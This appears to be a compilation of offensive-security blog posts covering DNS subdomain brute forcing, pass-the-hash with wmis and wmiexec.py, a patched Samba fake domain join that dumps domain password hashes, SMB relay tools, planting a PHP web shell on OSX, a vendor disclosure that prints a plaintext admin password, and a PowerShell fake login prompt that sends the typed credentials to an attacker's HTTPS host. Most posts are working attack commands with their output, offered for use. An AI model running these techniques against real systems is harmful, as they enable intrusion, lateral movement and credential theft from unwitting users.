Everyone has their list of hostnames they brute force domains with. In my last post I even mentioned a few ways to use one with XARGS or PARALLEL. But one fact about wordlist brute forcing is that there is no “one list to rule them all”. But over the years of doing DNS record collection I have noticed one thing, most domains have a large number of short hostnames that are easy to remember, usually 4 characters or less.

I’m sure you already know where I’m going with this, I wanted to brute force all possible hostnames up to 4 characters. For a long time I struggled with coding this, but couldn’t wrap my head around it. I would come back to it every so often, finally a few days ago I happened upon a script on gist: https://gist.github.com/petehamilton/4755855 that suited my needs perfectly.

I modified it to suite my needs (just use the yield method) and here is what I ended up with (remember DNS is case insensitive):

Notice: This script doesn’t end, it will keep doing lookups on longer and longer hostnames until you hit CTRL-C

1234567891011121314151617181920212223242526272829303132333435363738394041

#!/usr/bin/env ruby### Brute code stolen form: https://gist.github.com/petehamilton/4755855#@domain = 'microsoft.com'def result?(sub)  results = %x(dig +noall #{sub}.#{@domain} +answer)  if results != ""      puts "============================"      puts "FOUND: \t#{sub}"      puts "============================"      puts "#{results}"      puts "============================"  end  1 == 2enddef crack_yielding(chars)  crack_yield(chars){ |p|      return p if result?(p)  }enddef crack_yield(chars)  chars.each { |c| yield c }  crack_yield(chars) { |c|      chars.each do |x|          yield c + x      end  }endchars = ('a'..'z').to_a(0..9).each {|x| chars << x.to_s} crack_yielding(chars)

This worked but it was slow, so I sped it up using methods that I talked about in my last post and a quick modification:

I used this:

1234567891011121314151617181920212223242526272829303132

#!/usr/bin/env ruby### Brute code stolen form: https://gist.github.com/petehamilton/4755855#def result?(sub)  puts sub      1 == 2enddef crack_yielding(chars)  crack_yield(chars){ |p|      return p if result?(p)  }enddef crack_yield(chars)  chars.each { |c| yield c }  crack_yield(chars) { |c|      chars.each do |x|          yield c + x      end  }endchars = ('a'..'z').to_a(0..9).each {|x| chars << x.to_s} crack_yielding(chars)

which just prints all the possibilities:

1234567

abcdef...

and piped it into parallel + dig:

1

ruby brutelist.rb | parallel -j100 dig +noall {}.microsoft.com +answer

and got the following:

123456789101112131415161718192021

c.microsoft.com. 2   IN  CNAME   c.microsoft.akadns.net.c.microsoft.akadns.net.   499 IN  A   65.55.58.184e.microsoft.com.  3599    IN  A   191.234.1.50g.microsoft.com.  2798    IN  CNAME   g.msn.com.g.msn.com.        99  IN  CNAME   g.msn.com.nsatc.net.g.msn.com.nsatc.net.  148 IN  A   131.253.34.154i.microsoft.com.  779 IN  CNAME   i.toggle.www.ms.akadns.net.i.toggle.www.ms.akadns.net. 44    IN  CNAME   i.g.www.ms.akadns.net.i.g.www.ms.akadns.net.    225 IN  CNAME   i.microsoft.com.edgesuite.net.i.microsoft.com.edgesuite.net. 116 IN CNAME   a1475.g.akamai.net.a1475.g.akamai.net.   16  IN  A   23.45.65.26a1475.g.akamai.net.   16  IN  A   23.45.65.33m.microsoft.com.  3599    IN  CNAME   origin.mobile.ms.akadns.net.origin.mobile.ms.akadns.net. 299 IN   A   65.55.186.235s.microsoft.com.  3599    IN  CNAME   reroute.microsoft.com.reroute.microsoft.com.    3599    IN  A   65.55.58.201reroute.microsoft.com.    3599    IN  A   64.4.11.37cs.microsoft.com. 81  IN  CNAME   wedcs.trafficmanager.net.wedcs.trafficmanager.net. 7   IN  CNAME   wedcseus.cloudapp.net.wedcseus.cloudapp.net.    8   IN  A   137.116.48.250...

Happy bruting. Both scripts can be found on my gists page:

• Domain version: https://gist.github.com/mubix/9107284
• Parallel version: https://gist.github.com/mubix/9107276

PSEXEC has been a staple for Windows post exploitation pivoting and system administration for a long while. The basic premise of how all “psexec” tools work is:

1. (Optional) Upload a service executable (PSEXECSVC.EXE in the case of SysInternal’s tool) to the ADMIN$ share
2. Connect to the service manager on the remote host, and create a service based on either a local (to the remote system) executable or the uploaded one.
3. Run the service
4. Stop and delete the service and uploaded file pulling down the resulting output if any from the execution.

Now, as you can guess, the uploading of a file, creating, starting, stopping, and deletion of services create quite the logs and forensic evidence.

As you might imagine, thats not the best thing for us on the offensive side of infosec. Luckily big brother Microsoft provides another option, WMI (Windows Management Interface). I demonstrated the use of this in the past: HERE and HERE

The downside to using the WMIC directly is that you need a valid token or a valid password for it to work. Passing the hash didn’t used to be an available option.

That has changed with the “wmis” package on Kali Linux that incorporates the “Pass-the-Hash for 15 years toolkit”

(There is a slight problem where you have to play with it a bit to get it working on 64 bit Kali)

The other solution is supplied as an example in the Impacket library“wmiexec.py”. In my experience there are a few features that make it the better option.

1. Installing it on a random VPS is dead simple and doesn’t need the Kali repos to get right, nor Debian/Ubuntu.
2. It defaults to an “semi-interactive shell” which writes and reads output from the ADMIN$ shell by default. Something I would normally have to do manually with a bunch of tools
3. As with the WMIS package, it allows you to just create a process without the ADMIN$ write/read.

Enough crazy talk here is an example usage of each:

WMIS

Usage:

1234567891011

root@wpad:~# wmisUsage: [-?NPV] [-?|--help] [--usage] [-d|--debuglevel=DEBUGLEVEL] [--debug-stderr] [-s|--configfile=CONFIGFILE]        [--option=name=value] [-l|--log-basename=LOGFILEBASE] [--leak-report] [--leak-report-full]        [-R|--name-resolve=NAME-RESOLVE-ORDER] [-O|--socket-options=SOCKETOPTIONS] [-n|--netbiosname=NETBIOSNAME]        [-W|--workgroup=WORKGROUP] [--realm=REALM] [-i|--scope=SCOPE] [-m|--maxprotocol=MAXPROTOCOL]        [-U|--user=[DOMAIN\]USERNAME[%PASSWORD]] [-N|--no-pass] [--password=STRING] [-A|--authentication-file=FILE]        [-S|--signing=on|off|required] [-P|--machine-pass] [--simple-bind-dn=STRING] [-k|--kerberos=STRING]        [--use-security-mechanisms=STRING] [-V|--version]        //hostExample: wmis -U [domain/]adminuser%password //host cmd.exe /c dir c:\ > c:\windows\temp\output.txt 

Example:

12345

root@wpad:~# wmis -U administrator%aad3b435b51404eeaad3b435b51404ee:88e4d9fabaecf3dec18dd80905521b29 //172.16.102.141 calc.exeHASH PASS: Substituting user supplied NTLM HASH...HASH PASS: Substituting user supplied NTLM HASH...[wmi/wmis.c:172:main()] 1: calc.exeNTSTATUS: NT_STATUS_OK - Success

wmiexec.py

Using a password, but with hashes you just tell it -hashes :

Usage:

123456789101112131415161718192021

root@wpad:~/impacket/examples# ./wmiexec.py Impacket v0.9.12-dev - Copyright 2002-2014 Core Security Technologiesusage: wmiexec.py [-h] [-share SHARE] [-nooutput] [-hashes LMHASH:NTHASH]                  target [command [command ...]]positional arguments:  target                [domain/][username[:password]@]<address>  command               command to execute at the target. If empty it will                        launch a semi-interactive shelloptional arguments:  -h, --help            show this help message and exit  -share SHARE          share where the output will be grabbed from (default                        C$)  -nooutput             whether or not to print the output (no SMB connection                        created)authentication:  -hashes LMHASH:NTHASH                        NTLM hashes, format is LMHASH:NTHASH

Example:

1234567891011121314151617181920

root@wpad:~/impacket/examples# ./wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:88e4d9fabaecf3dec18dd80905521b29 administrator@172.16.102.141Impacket v0.9.12-dev - Copyright 2002-2014 Core Security TechnologiesSMBv2.1 dialect used[!] Launching semi-interactive shell - Careful what you executeC:\>dir Volume in drive C has no label. Volume Serial Number is 5CCA-B528 Directory of C:\07/13/2009  11:20 PM    <DIR>          PerfLogs10/07/2013  03:26 PM    <DIR>          Program Files07/14/2009  01:08 AM    <DIR>          Program Files (x86)04/25/2014  02:21 AM    <DIR>          Users05/11/2014  03:39 PM    <DIR>          Windows               0 File(s)              0 bytes               5 Dir(s)  52,884,389,888 bytes freeC:\>

So there was this blog post that talking about a number of ways to dump windows credentials by @lanjelot [definitly someone to follow] – here: https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/ and at the very bottom of this post it says “AD Replication (EXPERIMENTAL)”

What it boils down to is if you can position a system that can do DNS resolution to the target domain, and perform some other UDP traffic, you can fake join a samba server you control to a domain and it doesn’t require code execution in any way on the domain controller.

Notice: I am not doing this on a Kali Linux box, there is already an install of Samba there and I didn’t want to try uninstalling or modifying the one installed.

First, you need this patch:

wget http://files.securusglobal.com/samba-4.1.0_replication-only-patch.txt

and Samba 4.1.0

wget http://ftp.samba.org/pub/samba/stable/samba-4.1.0.tar.gz

You will probably also require some dependencies to be installed:

apt-get install python2.7-dev python-samba libacl1-dev build-essential libldap2-dev libkrb5-dev attr

Since the patch is kinda wonky, you need to make a src directory and extract samba into there first. Then apply the patch in whatever directory is above src

12345

mkdir srcmv samba-4.1.0.tar.gz src/cd src/tar zxvf samba-4.1.0.tar.gzcd /root/

So it would look like this:

123

samba-4.1.0_replication-only-patch.txtsrc/src/samba-4.1.0/

then run patch -p0 < samba-4.1.0_replication-only-patch.txt

1234

cd ./src/samba-4.1.0/./configuremakemake install

Prepare the box:

1

rm -rf /var/lib/samba; mkdir /var/lib/samba; rm -f /etc/samba/smb.conf

Next you need to make sure you are resolving correctly (if you can’t resolve the SRV record _ldap._tcp.sittingduck.info (sittingduck.info being the domain) then this isn’t going to work.

1

echo nameserver 192.168.92.37 > /etc/resolv.conf # this is the IP address of the DC

Then start the clone:

1

/usr/local/samba/bin/samba-tool domain join sittingduck.info DC -U sittingduck\\administrator

Looks like this:

1234567891011121314151617181920212223242526272829

root@sambabox:~/src/samba-4.1.0# /usr/local/samba/bin/samba-tool domain join sittingduck.info DC -U sittingduck\\administratorFinding a writeable DC for domain 'sittingduck.info'Found DC 2K8DC.sittingduck.infoPassword for [SITTINGDUCK\administrator]:workgroup is SITTINGDUCKrealm is sittingduck.infoCalling bare provisionNo IPv6 address will be assignedProvision OK for domain DN DC=sittingduck,DC=infoStarting replicationSchema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[402] linked_values[0]Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[804] linked_values[0]Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[1206] linked_values[0]Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[1521] linked_values[0]Analyze and apply schema objectsPartition[CN=Configuration,DC=sittingduck,DC=info] objects[402] linked_values[0]Partition[CN=Configuration,DC=sittingduck,DC=info] objects[804] linked_values[0]Partition[CN=Configuration,DC=sittingduck,DC=info] objects[1206] linked_values[0]Partition[CN=Configuration,DC=sittingduck,DC=info] objects[1608] linked_values[1]Partition[CN=Configuration,DC=sittingduck,DC=info] objects[1614] linked_values[11]Replicating critical objects from the base DN of the domainPartition[DC=sittingduck,DC=info] objects[100] linked_values[24]Partition[DC=sittingduck,DC=info] objects[353] linked_values[27]Done with always replicated NC (base, config, schema)Committing SAM databasedescriptor_sd_propagation_recursive: DC=DomainDnsZones,DC=sittingduck,DC=info not found under DC=sittingduck,DC=infodescriptor_sd_propagation_recursive: DC=ForestDnsZones,DC=sittingduck,DC=info not found under DC=sittingduck,DC=infoJoined domain SITTINGDUCK (SID S-1-5-21-3147519476-3247671789-820278723) as a DC

Then to get the hashes:

12345678

root@sambabox:~# /usr/local/samba/bin/pdbedit -L -w2K8DC$:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:CB14F1166BBE1749AC0FB40240C5DC30:[S          ]:LCT-530FC425:Administrator:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[U          ]:LCT-531006A4:krbtgt:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:F2EE6AB6F40810169E0E46B126CEFBEF:[DU         ]:LCT-530FC3FF:nobody:65534:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:[U          ]:LCT-00000000:jdoe:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[UX         ]:LCT-530FC5FF:uber:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[UX         ]:LCT-53101261:

Or you can do it with history:

123456789

root@sambabox:~# python samba-pwdump.py /usr/local/samba/private/sam.ldb.d/DC\=SITTINGDUCK\,DC\=INFO.ldb -historySAMBACLONE$:1104:::::2K8DC$:1000::cb14f1166bbe1749ac0fb40240c5dc30:::Administrator:500::88e4d9fabaecf3dec18dd80905521b29:::krbtgt:502::f2ee6ab6f40810169e0e46b126cefbef:::Guest:501:::::jdoe:1103::88e4d9fabaecf3dec18dd80905521b29:::uber:1105::88e4d9fabaecf3dec18dd80905521b29:::uber_history0:1105:444d1edcad01ae08f49f073e12e8cc14:88e4d9fabaecf3dec18dd80905521b29:::

Game over. The great thing is that it never actually shows up as a joined box in the domain, and as far as I can tell the only log on the real DC is the login success of a domain admin. Plus one of the huge benefits to this method is that once you have the database Samba makes it really easy to query information like group membership or users info after the fact, not just hashes.

This is my box. There are many like it, but they are all mine.

My malware is my best friend. It is my life. I must master it as I must master my life.

My malware, without me, is useless. Without my malware, I am useless. I must drop my malware true. I must rootkit better than my enemy who is trying to kill my binary. I must kit him before he kits me. I will…

My malware and I know that what counts in this war is not the boxes we pop, the noise of our root dance, nor the cheers coming from the Red Team room. We know that it is the root that count. We will root…

My malware is human, even as I, because it is my life. Thus, I will learn it as a brother. I will learn its weaknesses, its strength, its parts, its extensions, its dlls and its exes. I will keep my malware av free and ready, even as I am ready. We will become part of each other. We will…

Before God, I swear this creed. My malware and I are the defenders of my botnet. We are the masters of our enemy. We are the saviors of my shells.

So be it, until victory is the Red Team’s and there is no enemy, but peace!

Keeping it here for notes and just in case anyone else runs into this same issue.

12

brew install pipsudo ARCHFLAGS=-Wno-error=unused-command-line-argument-hard-error-in-future pip install pycrypto

If you have a better way please leave a comment below!

SMB Relay has been around for a long while. I even have a post about using it along with LNK files here: MS08-068 + MS10-046 = Fun until 2018

Here is the problem though. Most of the tools to exploit it either catch the authentication in NTLMv2/NTLMv1 (which is not always easy to crack) or assume administrative access (because they attempt to PSEXEC with the incoming session). Well, since MS08-068 thats much harder to pin down. You have to know who is going to hit your relay server and what other location they might be an admin on. You also have to a service you want to run on that target.

Current Tools:

• SMBRelay
• SMBRelay3
• SpiderLabs Responder
• SMBRelayX in Impacket
• HTTP NTLM Relay Metasploit Module
• SMB Relay PSExec Metasploit Module
• Oracle SMB Relay Metasploit Module
• SAP SMB Relay Metasploit Module

“Soft” relay tools:

Now, some would argue that you just spin up the relay at a target then leave it until one pops. I’m not really a fan of that. You will not only be creating multiple access attempt log entries, but you are also just throwing away all of those user authentication attempts. There are 3 tools that agree with me.

1. Squirtle
   • Squirtle is awesome plus it’s written in a language I understand (ruby) but it has one serious downfall, many of the post-auth features are left up to the user to develop. It does have a great API but needs some coding to get to do certain things.
2. Intercepter-NG
   • I have tested Interceptre-NG out a lot and it has some fantastic features, not to mention that it does relaying on a Windows host, which is impressive all by itself (due to 445 default bind). My only problem with it is that it’s closed source. But definitely recommended.

The 3rd is a tool called “ZackAttack” by Zack Fasel, you can find it here on Github:ZackAttack. You can find the video of the talk releasing this tool on Youtube. So what is so special about this tool? Other than the fact that most of the web interface is broken horribly it has this amazing bit of code that acts as a SOCKS proxy. This SOCKS proxy identifies SMB or HTTP traffic that has NTLM authentication going on and rewrites it based on captured sessions.

What does this mean? If I use SpiderLab’s Responder, for instance, to spoof/get/fake a bunch of users into connecting to my machine via automatic or forced methods to the capture/keep services that ZackAttack spins up, I can then run smbclient or Outlook or Web browser, push it through the ZackAttack SOCKS proxy, pick a username out of the captured names, and use any password I want when asked, and the SOCKS proxy will automatically replace it en route with the valid session information.

This way I can use every authentication that comes in to its highest potential for pwnage. The video below shows how this can be used to connect to a “Network share”

Update: One thing to mention that ZackAttack does that I haven’t seen other tools do, even Squirtle or Intercepter-NG is getting 3+ successful authentications out of a single relay from a user. ZackAttack does this with some clever HTTP Keep-Alive and SMB “reauth” kung fu.

Other References:

• 2014-02 SpiderLabs– Responder 2.0 Owning Windows Networks Part 3
• 2014-01 NetSPI Blog– SMB Attacks Through Directory Traversal
• 2013-06 Ares– SMB Hijacking Kerberos is defeated
• 2013-04 SANS Pentesting Blog– SMB Relay Demystified and NTLMv2 Pwnage with Python
• 2013-01 Core Security Training Video– How To Perform a SMB Relay Attack
• 2013-01 Mark Gamache– NTLM Challenge Response is 100% Broken
• 2012-12 NetSPI Blog– Executing SMB Relay Attacks via SQL Server using Metasploit
• 2012-07 WebstersProdigy– Metasploit Generic NTLM Relay Module
• 2012-04 Ares– Actuality of SMBRelay in Modern Windows Networks
• 2011-01 Digital Security Research Group Blog– SMBRelay Bible
• 2009-07 Carnal0wnage– Metasploit Oracle TNSCMD SMBRelay Demo
• 2008-11 Ron Bowes– Preventing SMB Relay Attacks
• 2008-08 Kurt Grutzmacher at DEF CON 16– NTLM is Dead!
• 2008-06 John Heasman– Stealing Password Hashes with Java and IE
• 2008-04 Eric Rachner: NTLM Relay Attacks– Released tool ‘scurvy’
• 2007-08 HD Moore and Valsmith– Tactical Exploitation
• 2004-12 (ARCHIVE.ORG) Jesse Burns at SySCAN– NTLM Authentication Unsafe
• 2002-01 Azbil SecurityFriday Ltd– ScoopLM
• 2001-03 @lantaCon– Reference from March 31 2001 talk

I tried finding all the original/semi original references about SMB (LM/NTLM) Relaying. If you have others please leave a comment below so I can add them to the list.

Let me start off by saying this post is easy for me to write in one facet as I’ve never been a heavy drinker or much enjoyed the taste of alcohol. So if you need a reason to disregard what I say next, I leave the door open.

I am still pretty much a runt in the infosec community as I didn’t even begin learning computers (outside of playing games on them) until 2005. However, one thing that has nagged at me for a long time is the intertwined nature of hacking/infosec and drinking. Its almost a right of passage in the common fraternity style. The problem lies in the fact that you don’t really “graduate” and leave those parties behind.

Now, I have certainly partaken in my share of parties and consumption, even with that nagging feeling in the back of my head. It didn’t really take root until just recently. I was at a conference where a student (who was not 21) that looked very much like an older version of my oldest child said that he was going to skip dinner to go get wasted with XYZ “Infosec Rockstar”.

That scared me into thinking that if my son goes into Infosec he will be basically expected to drink like an alcoholic. How can I want my kid to be expected (not forced) to drink a shot on stage if he gets accepted to speak at DEF CON.

We (the infosec community) are few, and we loose too many to idiotic things like drug overdose, drinking and driving, and other stupidly preventable crap. For that reason I actually don’t want to share the thing I feel so passionate about with my own kids.

My call to action is this:

If you are a conference goer, try going one con completely dry, and if you already do, maybe ask friend to join you.

If you are speaker, enough of the drinks on stage and drinking games. Do you really want the next generation, those you are trying to teach, to remember that part of your talk instead of the rest?

If you are a conference organizer, maybe a completely dry day at the con? or an AA meeting space?

If you are a podcaster, if you drink during the cast, make it about the taste and selection, instead of how wasted and totally useless the next hour of your listeners life will be.

ShmooCon runs an AA meeting at the con

Lets stop losing our friends and family because we are too weak to say ‘no thank you’ when someone approaches the dais with a shot.

This talk really touched home with me and I wanted to share it, and not just because he talked about Marines. ;–)

Forward this talk on to your fellow employees, boss, etc.

Anyone who knows me knows that I live in a tiny world of offensive security, so much so that I miss large world events entirely. (Like elections and hurricanes)

I didn’t know Aaron Swartz, or even 1% of what he was doing in the world to make it a better place and for that I am ashamed. I will do better, to look around, see what needs to be changed in this world and make it a reality.

The following is a Documentary about the life of Aaron Swartz. If you live under a similar rock as I, you can start here: http://en.wikipedia.org/wiki/Aaron_Swartz

Watch, learn, share, and help continue a legacy that Aaron started.

One of the problems with using PSEXEC from Metasploit (any of the psexec modules) is that it runs as SYSTEM. What’s the problem with that? Isn’t SYSTEM god mode? Ya, and normally I’d agree that it’s the best level to have, but the defenses these days have gotten better, and getting direct connections out is pretty rare. That leaves proxies, and as you know SYSTEM doesn’t get any proxy settings.

Here is a blog post that I made about setting the proxies for SYSTEM but leaving settings like this set is not only sloppy but hard to clean up.

Along comes RunAsCurrentUser-2.0.3.1.exe I found this gem by messing up a search on google for RunAsUser. Found it on this IBM support post.

Link to direct download: http://software.bigfix.com/download/bes/util/RunAsCurrentUser-2.0.3.1.exe

Here is a mirror uploaded to my Post Exploitation repo: https://github.com/mubix/post-exploitation/blob/master/win32bins/RunAsCurrentUser-2.0.3.1.exe

This binary takes a path to another executable as an argument. It then finds the currently logged in user and starts the provided executable as that user. AWESOME! This basically solves the whole PSEXEC->SYSTEM no-proxy settings issue. And it’s created by a legitimate company for legitimate reasons? w00tw00t. Game on!

Only two problems:

1. It is 335K, which doesn’t seem like much but over high latency lines that can take an eternity to transfer, especially over doubly encrypted channels like with a reverse_https meterpreter session.

2. It takes an argument which normally isn’t a huge challenge, but in our specific use case, psexec modules in Metasploit, it isn’t something we can do easily. You would have to upload your C2 binary, as well as the 335K RunAsCurrentUser over to the target host, then run the psexec_command module to execute them both, one as the argument of the other. Kinda sloppy.

So I set to try and figure out how this binary did it’s magic. As I’m not much of a reverse engineer I uploaded it to VirusTotal so I could take a look at it’s insides (plus, double check to see if it was being detected as malicious at all).

As far as I can tell the important pieces are the Windows API calls ImpersonateLoggedOnUser, and CreateProcessAsUserA. I set to trying to reproduce what it did in AutoIT (awesome stuff if you have never checked it out). I couldn’t quite get the API calls right, so I decided to give C++ a shot. Turned out to be pretty simple. I present to you “Milkman”:

https://gist.github.com/mubix/5d0cacdabfe092922fa3(full source included below)

This program (once compiled) takes one argument (or none at all) and runs calc.exe for every instance of the process you tell it to. If you run it without arguments it auto selects explorer.exe. So if you create a service:

12

C:\temp\>sc create SuperService binpath= C:\Temp\milkman.exe type= own start= auto[SC] CreateService SUCCESS

It will start up every time the computer starts, which is completely useless, since there won’t be any users logged in at that point, but you get where this can go. Features to add to this at point are:

1. Create a service binary that responds to START/STOP/PAUSE commands and such so that running this as a persistence method would actually be useful.
2. Add a loop so that it continues to run checking for explorer.exe every so often so it can catch when someone is logged in.
3. Finally the obvious one is to change it from being calc.exe that it runs by accepting another argument or some other kind of config option.

Thoughts? What would you like Milkman to do, or what use case do you think a tweak would make it work better for? Leave a comment below.

As I learn more and more about OSX I find things that surprise me. For instance, in this post I will be showing you how to, with root or sudo priviledge, enable the built-in apache server on OSX and it’s PHP module….

I am working with OSX Mavericks so your locations may vary based on the version of OSX your target it.

First things first is to enable the PHP module for the Apache server.

1

sudo nano -w /etc/apache2/httpd.conf

(vi or emacs to your heart’s content). But what we are looking for is to uncomment the following line:

1

#LoadModule php5_module libexec/apache2/libphp5.so

Once you do that, start up Apache. This can be done temporarily (won’t survive a reboot) with the apachectl command:

1

sudo apachectl start

Or you can make it more permanent with launchctl:

1

sudo launchctl load -w /System/Library/LaunchDaemons/org.apache.httpd.plist

And undoing the damage with:

1

sudo launchctl unload -w /System/Library/LaunchDaemons/org.apache.httpd.plist

After that, just drop your favorite PHP shell into the /Library/WebServer/Documents/ directory and you’re done. (My favorites are b374k and PHP Meterpreter.

Update: I originally posted this to the Full Disclosure mailing list but for some reason it wasn’t accepted via the moderator so I’m posting it here. First, so that the information does get out there, and second to see if anyone knows why it may have been rejected.

I was helping out a family member with their computer when it came up that they “already had remote help software” (SingleClickConnect or SCC), when I asked what this was, the family member said it was installed by Dell Support when trying to fix their issue. This was in 2008. I removed it, and helped to fix the issue.

In 2010 another issue arose on the new computer (Dell again) of the same family member. Again, calling support first they had installed this software.

Disclaimer: I can not say for certain that it was Dell’s support rep, or even that it was them that installed it, but if Dell is using this as a means of support they should probably cease for the following reasons:

Apache (port 40080) listening 0.0.0.0, MySQL (port 17771) listening 127.0.0.1, PHP, and UltraVNC (5900) are installed as a part of the software package.

ISSUE #1

Without decoding the ionCube “copyright protecting” software a large number of XSS, CSRF, and SQLi vulnerabilities were found, all unauthenticated to the web app that runs there.

No specifics are being posted on these vulnerabilities as I assume the site on the net (company’s site), where a registered user would log in are the same as the ones locally hosted (at least the app looks the same and has similar page structure)

ISSUE #2

MySQL’s root password is blank and there are two other default accounts as well allowing easy privilege escalation to SYSTEM (via the SCC local account – see ISSUE #5):

dsl *7E1CA3417E3A159A9188657F44C7034A8E9FDFF2
tera *B2744A6BC5E8B1667BE5AED0111A2B941356E4A4

^ uncracked at this point. For all I know they could be randomized at install

ISSUE #3

Another service listens on 0.0.0.0 via port 17667 that I haven’t been able to identify, however when you connect to the socket, it starts listing users, services, printers and interfaces (and that is without sending any data to it).

$ ncat 172.16.102.149 17667
8�TXPBASELINEXP_BASEP�RAdministratorGuestHelpAssistantSingleClick
AdminSUPPORT_388945a0!aCACAMD PCNET Family PCI Ethernet Adapter -
Packet Scheduler Miniport{47F69AAC-AE9A-40A9-88F5-A246A169CE92}�f�
)�n�����f�f��fDownloadsC:\Documents and Settings\Administrator\My
Documents\DownloadsMicrosoft XPS Document
WriterXPSPortprinter#:2TPVM#:1TPVMACDWindows FirewallMicrosoftCreative
Sound Blaster PCI

ISSUE #4

When UltraVNC is installed, it uses the same password as the one for your ‘registered’ account (just password auth) and listens on 0.0.0.0. It is easily to decrypt from the UltraVNC.ini that is located in %ApplicationData% for the user

ISSUE #5

A local account called “SingleClick Admin” is installed with a static password and added to the Administrators group. 3 services are also installed with the SingleClick Admin account as the user it runs under:

Package d'authentification  : NTLM
Utilisateur principal       : SingleClick Admin
     msv1_0 :     lm{ 7a9793d3082ba83b790ce07b3bdf85ea }, ntlm{ 2c292724d67fcf310d1c4dd153467be8 }
     kerberos :     ~!3no1972!~
     ssp :
     wdigest :     ~!3no1972!~


 8. Name         : _SC_Apache2.2
 8. Service      : .\SingleClick Admin
 8. Current      : ~!3no1972!~

 9. Name         : _SC_dsl-fs-sync
 9. Service      : .\SingleClick Admin
 9. Current      : ~!3no1972!~
 9. Old          : ~!3no1972!~

10. Name         : _SC_hnmsvc
10. Service      : .\SingleClick Admin
10. Current      : ~!3no1972!~

CONCERN #1

As far as I can tell the software continuously scans you local network for other computers and file system for changes and reports these back to the central server so that when you login to their service you can see your files and connect to other systems in the LAN of the machine SingleClickConnect is installed on.

CONCERN #2

The user account password that you use to register and connect remotely is stored in the database. This actually looks decently done, or I just haven’t been able to identify the storage

Database:     p2p
Table:           config_info
Value:           “user_hash”

CONCERN #3

Not sure what this registry key contains other than being named Cred4RA and assuming it’s credentials for the remote administration. Hopefully encrypted some how.

[HKEY_LOCAL_MACHINE\SOFTWARE\SingleClick Systems\Advanced Networking
Service\Settings\Remote Access]
"ConfigState"=dword:00000001
"Cred4RA"=hex:01,00,00 (snip snip)

Additional Information

• Software original site: http://www.singleclickconnect.com/
• Current site: http://www.vivedriveconnect.com/
• Direct download of software (for home use): http://downloads.vivedriveconnect.com/scc_setup.exe

Vendor Contact

• Email sent in 2010 July about issues 1 – 5
  • No reply, and forgot about until 2013 when the software was mentioned by a friend (if I had ever heard of it)
• 2013 April– Email sent again, forwarding original, bounced back as account unknown
• 2014 August– Accidentally found notes while searching for something else, attempted to relocate the software via Archive.org with the feeling that the site had gone away and happened upon the new site,, downloaded software, confirmed issues, and forwarded the email to the new point of contact at the new domain. No response.
• 2014 September, Full disclosure.

Dell… If your techs do actually use this software for support (I hope not) in any form or fashion, you are putting each one of them at a pretty high risk.

Metasploit Minute has entered into it’s 3rd “season”. And we kick it off with using the Metasploit capture modules to capture creds from this powershell popup. The cool thing about this is you can leave it to execute on a system without any other code on disk and get creds constantly as any level of user. No admin, no UAC bypass needed. Just a bunch of creds for free.. over SSL. ;–)

Here is the video:

Here is the code:

1234567

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$wc = new-object net.webclient;$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;$wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');$result = $wc.downloadstring('https://172.16.102.163');

Lets break down the code line by line:

1

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserName,[Environment]::UserDomainName);

This tells windows to prompt for credentials, with the title of “Failed Authentication”, no info in the comment (so it uses default), and include the username and domain in the box to add authenticity. Thats where all the magic is, everything else is just gravy.

1

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};

Tells powershell not to verify SSL certificates (allows us to use self signed certs in the HTTPS transaction later

12

$wc = new-object net.webclient;$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");

Creates a new webclient object and sets its user agent to ‘wget’

12

$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;

Tells powershell to use whatever proxy the current user uses with whatever credentials they have cached. If one or both are unnecessary it just ignores these settings.

1

$wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');

Tells powershell that the HTTP-Basic credentials to use are the ones typed in the popup box recently by the user.

1

$result = $wc.downloadstring('https://172.16.102.163');

And finally the request to HTTP-Basic capture module in metasploit, but you could have anything you want capture these creds.

123

